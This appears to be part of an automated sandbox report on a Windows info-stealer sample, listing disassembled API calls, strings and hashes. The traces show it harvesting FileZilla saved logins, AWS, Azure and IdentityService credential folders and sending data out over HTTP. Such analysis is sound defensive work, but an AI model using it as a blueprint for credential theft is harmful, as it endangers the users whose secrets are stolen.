                                          • lstrlenA.KERNEL32(00000000), ref: 00410427
                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                          • lstrlenA.KERNEL32(00000000), ref: 00410475
                                          • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                          • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                          • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                          • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                          • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                          • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                          • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                          • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                          • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                          • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                          • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                          • strtok_s.MSVCRT ref: 00410679
                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                          • memset.MSVCRT ref: 004106DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                          • API String ID: 337689325-514892060
                                          • Opcode ID: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                          • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                          • Opcode Fuzzy Hash: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                          • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                          APIs
                                          • lstrlen.KERNEL32(00424DA0), ref: 022C4833
                                          • lstrlen.KERNEL32(00424E50), ref: 022C483E
                                          • lstrlen.KERNEL32(00424F18), ref: 022C4849
                                          • lstrlen.KERNEL32(00424FD0), ref: 022C4854
                                          • lstrlen.KERNEL32(00425078), ref: 022C485F
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 022C486E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022C4875
                                          • lstrlen.KERNEL32(00425120), ref: 022C4883
                                          • lstrlen.KERNEL32(004251C8), ref: 022C488E
                                          • lstrlen.KERNEL32(00425270), ref: 022C4899
                                          • lstrlen.KERNEL32(00425318), ref: 022C48A4
                                          • lstrlen.KERNEL32(004253C0), ref: 022C48AF
                                          • lstrlen.KERNEL32(00425468), ref: 022C48C3
                                          • lstrlen.KERNEL32(00425510), ref: 022C48CE
                                          • lstrlen.KERNEL32(004255B8), ref: 022C48D9
                                          • lstrlen.KERNEL32(00425660), ref: 022C48E4
                                          • lstrlen.KERNEL32(00425708), ref: 022C48EF
                                          • lstrlen.KERNEL32(004257B0), ref: 022C4918
                                          • lstrlen.KERNEL32(00425858), ref: 022C4923
                                          • lstrlen.KERNEL32(00425920), ref: 022C492E
                                          • lstrlen.KERNEL32(004259C8), ref: 022C4939
                                          • lstrlen.KERNEL32(?), ref: 022C4944
                                          • strlen.MSVCRT ref: 022C4957
                                          • lstrlen.KERNEL32(00425B18), ref: 022C497F
                                          • lstrlen.KERNEL32(00425BC0), ref: 022C498A
                                          • lstrlen.KERNEL32(00425C68), ref: 022C4995
                                          • lstrlen.KERNEL32(00425D10), ref: 022C49A0
                                          • lstrlen.KERNEL32(00425DB8), ref: 022C49AB
                                          • lstrlen.KERNEL32(00425E60), ref: 022C49BB
                                          • lstrlen.KERNEL32(00425F08), ref: 022C49C6
                                          • lstrlen.KERNEL32(00425FB0), ref: 022C49D1
                                          • lstrlen.KERNEL32(00426058), ref: 022C49DC
                                          • lstrlen.KERNEL32(00426100), ref: 022C49E7
                                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022C4A03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                          • String ID:
                                          • API String ID: 2127927946-0
                                          • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction ID: 9c0f284fc2ccd3e2908ef6c8000a71173df018f982b8bb299c25c1bec77df52b
                                          • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction Fuzzy Hash: A541B779740624EBC718AFE5EC89B987F71AB4C712BA0C066F90299190CBB5D5019B3E
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022D9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022D9072
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022C9C53
                                            • Part of subcall function 022C9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022C9C78
                                            • Part of subcall function 022C9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022C9C98
                                            • Part of subcall function 022C9C27: ReadFile.KERNEL32(000000FF,?,00000000,022C16F6,00000000), ref: 022C9CC1
                                            • Part of subcall function 022C9C27: LocalFree.KERNEL32(022C16F6), ref: 022C9CF7
                                            • Part of subcall function 022C9C27: CloseHandle.KERNEL32(000000FF), ref: 022C9D01
                                            • Part of subcall function 022D9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022D90B9
                                          • strtok_s.MSVCRT ref: 022D0582
                                          • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022D05C9
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D05D0
                                          • StrStrA.SHLWAPI(00000000,00421618), ref: 022D05EC
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D05FA
                                            • Part of subcall function 022D8B47: malloc.MSVCRT ref: 022D8B4F
                                            • Part of subcall function 022D8B47: strncpy.MSVCRT ref: 022D8B6A
                                          • StrStrA.SHLWAPI(00000000,00421620), ref: 022D0636
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D0644
                                          • StrStrA.SHLWAPI(00000000,00421628), ref: 022D0680
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D068E
                                          • StrStrA.SHLWAPI(00000000,00421630), ref: 022D06CA
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D06DC
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D0769
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D0781
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D0799
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D07B1
                                          • lstrcat.KERNEL32(?,0042164C), ref: 022D07C9
                                          • lstrcat.KERNEL32(?,00421660), ref: 022D07D8
                                          • lstrcat.KERNEL32(?,00421670), ref: 022D07E7
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D07FA
                                          • lstrcat.KERNEL32(?,00421678), ref: 022D0809
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D081C
                                          • lstrcat.KERNEL32(?,0042167C), ref: 022D082B
                                          • lstrcat.KERNEL32(?,00421680), ref: 022D083A
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D084D
                                          • lstrcat.KERNEL32(?,00421688), ref: 022D085C
                                          • lstrcat.KERNEL32(?,0042168C), ref: 022D086B
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D087E
                                          • lstrcat.KERNEL32(?,00421698), ref: 022D088D
                                          • lstrcat.KERNEL32(?,0042169C), ref: 022D089C
                                          • strtok_s.MSVCRT ref: 022D08E0
                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022D08F5
                                          • memset.MSVCRT ref: 022D0944
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                          • String ID:
                                          • API String ID: 3689735781-0
                                          • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                          • Instruction ID: cc7b04d65b3c6fe1bdba99e519daa8439f61f185e7c3b23c7221d36427c9a37a
                                          • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                          • Instruction Fuzzy Hash: 88D14A75A60308ABCB04EBF4DD85EEEB77AFF14300F544518E102A6198DF78AA05CF65
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                          • StrCmpCA.SHLWAPI(?,0079B138), ref: 00405A13
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0079B0D8,00000000,?,00794A48,00000000,?,00421A1C), ref: 00405E71
                                          • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                          • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                          • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                          • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                          • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                          • memcpy.MSVCRT(?), ref: 00405EFE
                                          • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                          • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                          • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                          • HttpOpenRequestA.WININET(00000000,0079B248,?,0079ABA0,00000000,00000000,00400100,00000000), ref: 00405BF8
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                          • String ID: "$"$------$------$------$HJy
                                          • API String ID: 1406981993-2052426667
                                          • Opcode ID: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                          • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                          • Opcode Fuzzy Hash: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                          • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022D8DC7: GetSystemTime.KERNEL32(00420E1A,xJy,004205AE,?,?,022C1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022D8DED
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022CD1EA
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022CD32E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022CD335
                                          • lstrcat.KERNEL32(?,00000000), ref: 022CD46F
                                          • lstrcat.KERNEL32(?,00421478), ref: 022CD47E
                                          • lstrcat.KERNEL32(?,00000000), ref: 022CD491
                                          • lstrcat.KERNEL32(?,0042147C), ref: 022CD4A0
                                          • lstrcat.KERNEL32(?,00000000), ref: 022CD4B3
                                          • lstrcat.KERNEL32(?,00421480), ref: 022CD4C2
                                          • lstrcat.KERNEL32(?,00000000), ref: 022CD4D5
                                          • lstrcat.KERNEL32(?,00421484), ref: 022CD4E4
                                          • lstrcat.KERNEL32(?,00000000), ref: 022CD4F7
                                          • lstrcat.KERNEL32(?,00421488), ref: 022CD506
                                          • lstrcat.KERNEL32(?,00000000), ref: 022CD519
                                          • lstrcat.KERNEL32(?,0042148C), ref: 022CD528
                                          • lstrcat.KERNEL32(?,00000000), ref: 022CD53B
                                          • lstrcat.KERNEL32(?,00421490), ref: 022CD54A
                                            • Part of subcall function 022DAA87: lstrlen.KERNEL32(022C516C,?,?,022C516C,00420DDE), ref: 022DAA92
                                            • Part of subcall function 022DAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022DAAEC
                                          • lstrlen.KERNEL32(?), ref: 022CD591
                                          • lstrlen.KERNEL32(?), ref: 022CD5A0
                                          • memset.MSVCRT ref: 022CD5EF
                                            • Part of subcall function 022DACD7: StrCmpCA.SHLWAPI(0064A350,022CAA0E,?,022CAA0E,0064A350), ref: 022DACF6
                                          • DeleteFileA.KERNEL32(00000000), ref: 022CD61B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                          • String ID: @/y$`oy$.y
                                          • API String ID: 1973479514-2871860770
                                          • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                          • Instruction ID: 6bc0aab897d0711fc408c65b9e5ee5f944f2bdf8c83a0c5e7642a257385cd0ef
                                          • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                          • Instruction Fuzzy Hash: 21E15A75960208ABCB08FBE4DD95EEE737ABF24301F504259F106A71A4DF35AA09CF61
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00794A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                          • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                          • lstrcatA.KERNEL32(?,00000000,00792DF0,00421474,00792DF0,00421470,00000000), ref: 0040D208
                                          • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                          • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                          • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                          • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                          • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                          • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                          • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00792F70,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          • lstrlenA.KERNEL32(?), ref: 0040D32A
                                          • lstrlenA.KERNEL32(?), ref: 0040D339
                                          • memset.MSVCRT ref: 0040D388
                                            • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                          • String ID: @/y$`oy$.y
                                          • API String ID: 2775534915-2871860770
                                          • Opcode ID: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                          • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                          • Opcode Fuzzy Hash: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                          • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                          APIs
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A51
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A68
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A7F
                                            • Part of subcall function 022C4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022C4AA0
                                            • Part of subcall function 022C4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022C4AB0
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022C5C5F
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022C5C7A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022C5DFA
                                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,HJy,00000000,?,00421A1C), ref: 022C60D8
                                          • lstrlen.KERNEL32(00000000), ref: 022C60E9
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 022C60FA
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022C6101
                                          • lstrlen.KERNEL32(00000000), ref: 022C6116
                                          • memcpy.MSVCRT(?,00000000,00000000), ref: 022C612D
                                          • lstrlen.KERNEL32(00000000), ref: 022C613F
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022C6158
                                          • memcpy.MSVCRT(?), ref: 022C6165
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 022C6182
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022C6196
                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022C61B3
                                          • InternetCloseHandle.WININET(00000000), ref: 022C6217
                                          • InternetCloseHandle.WININET(00000000), ref: 022C6224
                                          • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022C5E5F
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • InternetCloseHandle.WININET(00000000), ref: 022C622E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                          • String ID: HJy
                                          • API String ID: 1703137719-2726783869
                                          • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                          • Instruction ID: f9be7a9eba73af33116529da3967425e95a1ef1c14b7166a5216eb8dc38915d4
                                          • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                          • Instruction Fuzzy Hash: 7C12FE71930328ABCB15EBE4DD95FEEB37ABF24700F504299A10662194EF742B89CF54
                                          APIs
                                          • memset.MSVCRT ref: 00414D87
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                          • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          • memset.MSVCRT ref: 00414E13
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                          • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                          • memset.MSVCRT ref: 00414E9F
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                          • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
